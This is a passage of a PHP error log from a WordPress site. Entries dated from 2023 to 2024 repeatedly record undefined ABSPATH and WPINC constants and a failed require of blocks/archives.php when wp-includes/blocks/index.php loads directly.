00:22:48 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2023 00:22:48 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Apr-2023 13:05:06 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Apr-2023 13:05:06 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Apr-2023 13:05:06 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Apr-2023 13:05:06 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Jun-2023 17:40:52 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Jun-2023 17:40:52 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Jun-2023 17:40:52 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Jun-2023 17:40:52 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Jun-2023 17:41:02 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Jun-2023 17:41:02 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Jun-2023 17:41:02 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Jun-2023 17:41:02 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2023 06:09:20 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2023 06:09:20 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2023 06:09:20 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2023 06:09:20 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2023 13:52:18 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2023 13:52:18 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2023 13:52:18 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2023 13:52:18 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Sep-2023 10:45:02 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Sep-2023 10:45:02 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Sep-2023 10:45:02 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Sep-2023 10:45:02 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Sep-2023 03:14:26 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Sep-2023 03:14:26 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Sep-2023 03:14:26 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Sep-2023 03:14:26 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2023 10:44:14 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2023 10:44:14 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2023 10:44:14 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2023 10:44:14 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2023 10:58:09 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2023 10:58:09 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2023 10:58:09 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2023 10:58:09 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Nov-2023 12:30:08 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Nov-2023 12:30:09 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Nov-2023 12:30:09 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Nov-2023 12:30:09 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Nov-2023 19:03:49 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Nov-2023 19:03:49 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Nov-2023 19:03:49 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Nov-2023 19:03:49 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Dec-2023 10:26:51 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Dec-2023 10:26:51 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Dec-2023 10:26:51 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Dec-2023 10:26:51 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Dec-2023 01:15:27 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Dec-2023 01:15:27 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Dec-2023 01:15:27 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Dec-2023 01:15:27 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Feb-2024 06:29:51 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Feb-2024 06:29:51 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Feb-2024 06:29:51 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Feb-2024 06:29:51 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Feb-2024 10:58:08 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Feb-2024 10:58:08 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Feb-2024 10:58:08 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Feb-2024 10:58:08 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Feb-2024 08:35:46 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Feb-2024 08:35:46 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Feb-2024 08:35:46 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Feb-2024 08:35:46 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Mar-2024 12:08:52 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Mar-2024 12:08:52 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Mar-2024 12:08:52 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Mar-2024 12:08:52 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2024 01:35:59 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2024 01:35:59 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2024 01:35:59 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2024 01:35:59 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2024 10:28:22 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2024 10:28:22 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2024 10:28:22 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2024 10:28:22 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Mar-2024 17:28:45 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Mar-2024 17:28:45 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Mar-2024 17:28:45 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Mar-2024 17:28:45 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Apr-2024 12:49:47 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Apr-2024 12:49:47 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Apr-2024 12:49:47 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Apr-2024 12:49:47 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Apr-2024 05:00:32 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Apr-2024 05:00:32 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Apr-2024 05:00:32 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Apr-2024 05:00:32 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2024 17:15:54 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2024 17:15:54 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2024 17:15:54 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2024 17:15:54 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2024 18:03:09 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2024 18:03:09 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2024 18:03:09 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2024 18:03:09 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2024 06:49:58 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2024 06:49:58 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2024 06:49:58 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Jun-2024 06:49:58 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Jun-2024 19:55:59 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Jun-2024 19:55:59 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Jun-2024 19:55:59 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Jun-2024 19:55:59 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Jun-2024 06:26:07 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Jun-2024 06:26:07 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Jun-2024 06:26:07 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Jun-2024 06:26:07 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Jul-2024 16:59:33 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Jul-2024 16:59:33 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Jul-2024 16:59:33 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Jul-2024 16:59:33 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Jul-2024 17:24:05 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/archives.php:119 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/archives.php on line 119 [03-Aug-2024 02:02:16 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Aug-2024 02:02:16 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Aug-2024 02:02:16 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Aug-2024 02:02:16 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Sep-2024 16:45:18 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Sep-2024 16:45:18 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Sep-2024 16:45:18 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Sep-2024 16:45:18 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2024 17:07:45 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2024 17:07:45 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2024 17:07:45 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Sep-2024 17:07:45 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Oct-2024 10:32:28 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Oct-2024 10:32:28 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Oct-2024 10:32:28 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Oct-2024 10:32:28 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2024 16:26:47 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 